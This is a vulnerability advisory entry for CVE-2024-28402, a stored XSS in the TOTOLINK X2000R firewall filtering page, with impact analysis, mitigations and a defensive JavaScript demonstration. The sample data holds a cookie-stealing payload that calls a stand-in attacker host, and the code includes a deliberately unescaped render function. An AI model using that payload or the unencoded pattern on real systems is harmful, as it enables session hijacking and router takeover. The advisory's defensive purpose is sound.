CVE-2024-28402: n/a
TOTOLINK X2000R before V1.0.0-B20231213.1013 contains a Stored Cross-site scripting (XSS) vulnerability in IP/Port Filtering under the Firewall Page.
AI Analysis
Technical Summary
CVE-2024-28402 is a stored cross-site scripting (XSS) vulnerability in the TOTOLINK X2000R wireless router, affecting firmware versions before V1.0.0-B20231213.1013. The flaw is in the IP/Port Filtering feature on the Firewall page of the router's web-based management interface. Stored XSS means that attacker-supplied input is saved by the device and later written into the management page without output encoding, so the browser treats it as markup rather than as text. An authenticated user with low privileges can save a filtering rule whose fields contain HTML or JavaScript; whenever another user, including the administrator, opens the Firewall page, that script runs in their browser within the router's origin, where it can read the session, submit configuration changes with the victim's privileges, or redirect the victim to an attacker-controlled site. The CVSS v3.1 vector (AV:A/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L) encodes this: the attacker needs adjacent-network access (the LAN or Wi-Fi on which the management interface is served, not the Internet), low attack complexity, low privileges, and a victim who views the page. Scope is changed because the payload executes in the victim's browser rather than in the vulnerable web server component, and confidentiality, integrity and availability are each rated low. The record references no public exploit code, and the affected-version range indicates that firmware V1.0.0-B20231213.1013 contains the fix. The risk is moderate and is highest where several people share router management, or where the router's LAN or Wi-Fi is reachable by semi-trusted users.
Potential Impact
The vulnerability allows an authenticated attacker with low privileges to run arbitrary script in the browser of anyone who views the Firewall page, typically the administrator. From there the script can hijack the administrator's session, change configuration such as firewall, port-forwarding or DNS settings, or create new accounts, which is in effect a privilege escalation from a low-privileged account to full control of the device. Confidentiality and integrity of network management suffer directly, and availability suffers if the injected script alters or deletes filtering and routing rules. Organizations using the X2000R in multi-user or semi-public environments (shared offices, guest networks, small ISPs handing routers to tenants) are the most exposed, and the impact grows where the management interface is reachable from less trusted segments or where administrative credentials are shared or weak. Although exploitation requires authentication and a victim viewing the page, the stored nature of the XSS means the payload fires for every user who opens the page until it is removed, giving an attacker a persistent foothold on the device that defines the network perimeter.
Mitigation Recommendations
1. Update the X2000R to firmware V1.0.0-B20231213.1013 or later, which is the fixed build the affected-version range points to, and verify the installed version afterwards.
2. Restrict access to the management interface to trusted networks and users, preferably via VPN or an isolated management VLAN, and make sure it is not reachable from the WAN or guest Wi-Fi.
3. Enforce strong authentication: unique, complex passwords and, if the firmware supports it, multi-factor authentication for management access.
4. Audit the existing IP/Port Filtering entries for content that does not belong in a rule (angle brackets, quotes, "javascript:", "onerror=" and similar), remove any rule you did not create, and keep reviewing configuration changes for suspicious input.
5. Do not share management credentials; give each operator an individual account with the lowest privilege level that covers their tasks.
6. Until the firmware is updated, limit who may edit IP/Port Filtering rules to the administrators themselves, since the missing output encoding is in the firmware and cannot be corrected by operators.
7. Train users with management access to be wary of links that open the router interface and of unexpected prompts or redirects when they do.
8. Segment the network so that a compromised router does not give direct reach to critical infrastructure.
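The rendering defect from the technical summary and the audit step from the mitigations, as an added example rather than TOTOLINK's own firmware code: it renders a constructed set of filtering rules first the vulnerable way (raw string concatenation into HTML) and then with contextual output encoding, and it validates stored rules against the tight grammar an IP/port filter actually needs so that a planted payload stands out. The field names (name, ip, port), the sample rules and the table markup are assumptions; the X2000R's real page template is not part of the record.

```javascript
// Added illustration of the stored-XSS pattern and of the audit step above.
// Not TOTOLINK firmware: the rule fields (name, ip, port) and the table
// layout are assumptions standing in for whatever the X2000R really stores.

// Constructed sample of stored IP/Port Filtering rules. Rule 1 carries a
// payload that a low-privileged account could have saved into a text field.
const STORED_RULES = [
  { name: "Block guest printer", ip: "192.168.0.50", port: "9100" },
  {
    name: '<img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">',
    ip: "192.168.0.77",
    port: "22",
  },
];

// Vulnerable pattern: stored values are concatenated straight into the HTML
// of the Firewall page, so saved markup executes in the viewing admin's browser.
function renderRulesVulnerable(rules) {
  const rows = rules.map(
    (r) => `<tr><td>${r.name}</td><td>${r.ip}</td><td>${r.port}</td></tr>`
  );
  return `<table>${rows.join("")}</table>`;
}

// Output encoding for HTML text and quoted-attribute contexts.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened pattern: encode every stored field at the point it enters the
// document. Encoding on output also neutralises payloads saved before the fix.
function renderRulesSafe(rules) {
  const rows = rules.map(
    (r) =>
      `<tr><td>${escapeHtml(r.name)}</td><td>${escapeHtml(r.ip)}</td>` +
      `<td>${escapeHtml(r.port)}</td></tr>`
  );
  return `<table>${rows.join("")}</table>`;
}

// Defence in depth: validate on input as well. IP and port have a tight
// grammar; the free-text name is limited to a conservative character set.
function isIpv4(s) {
  const parts = String(s).split(".");
  return parts.length === 4 && parts.every((p) => /^\d{1,3}$/.test(p) && Number(p) <= 255);
}
function isPort(s) {
  const n = Number(s);
  return /^\d{1,5}$/.test(String(s)) && n >= 1 && n <= 65535;
}
// Returns null for a valid rule, otherwise the name of the first bad field.
function validateRule(rule) {
  if (!/^[A-Za-z0-9 ._-]{1,32}$/.test(rule.name)) return "name";
  if (!isIpv4(rule.ip)) return "ip";
  if (!isPort(rule.port)) return "port";
  return null;
}

// Audit helper for an existing configuration (mitigation step above): list
// the rules that fail validation, which is how a planted payload shows up.
function findSuspiciousRules(rules) {
  return rules
    .map((r, index) => ({ index, field: validateRule(r) }))
    .filter((x) => x.field !== null);
}

console.log("suspicious rules:", JSON.stringify(findSuspiciousRules(STORED_RULES)));
```

Run it with node. The encoding fix belongs in the firmware, so for an operator the useful part is the validation and audit logic: export or copy the rule list and run every entry through the same checks, flagging anything that is not a plain name, a dotted-quad address and a port number.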
Affected Countries
China, United States, India, Brazil, Russia, Germany, United Kingdom, France, South Korea, Japan
Technical Details
- Data Version: 5.1
- Assigner Short Name: mitre
- Date Reserved: 2024-03-08T00:00:00.000Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 699f6d8fb7ef31ef0b588937
Added to database: 2/25/2026, 9:45:51 PM
Last enriched: 2/28/2026, 10:20:05 AM
Last updated: 4/12/2026, 4:19:37 AM